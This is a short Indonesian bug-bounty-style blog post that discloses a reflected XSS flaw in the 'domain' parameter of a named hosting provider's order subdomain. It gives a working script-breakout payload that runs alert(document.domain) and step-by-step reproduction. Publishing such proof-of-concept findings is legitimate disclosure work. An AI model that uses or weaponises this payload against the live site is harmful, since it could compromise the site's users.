Bug Reflected XSS ini terletak pada subdomain Rumahweb, yaitu order2.rumahweb.com.
- Vulnerability url & parameter : https://order2.rumahweb.com/?domain=
- Payload : ");</script><svg/onload=alert(document.domain)>
- Langkah langkah reproduksi :
- Yang pertama buka https://order2.rumahweb.com/?domain= pada browser kalian.
- Lalu masukkan Payload setelah url tersebut https://order2.rumahweb.com/?domain=");</script><svg/onload=alert(document.domain)>
- Dan kalian akan mendapati Reflected XSS pada halaman tersebut, seperti screenshot dibawah ini.
Itu tadi sedikit berbagi bug bersama saya, semoga saja Bug Reflected XSS ini segera diperbaiki oleh pihak pengelola website tersebut.
Sekian dari saya, Happy Bug Hunting and thanks for come here.
0 comments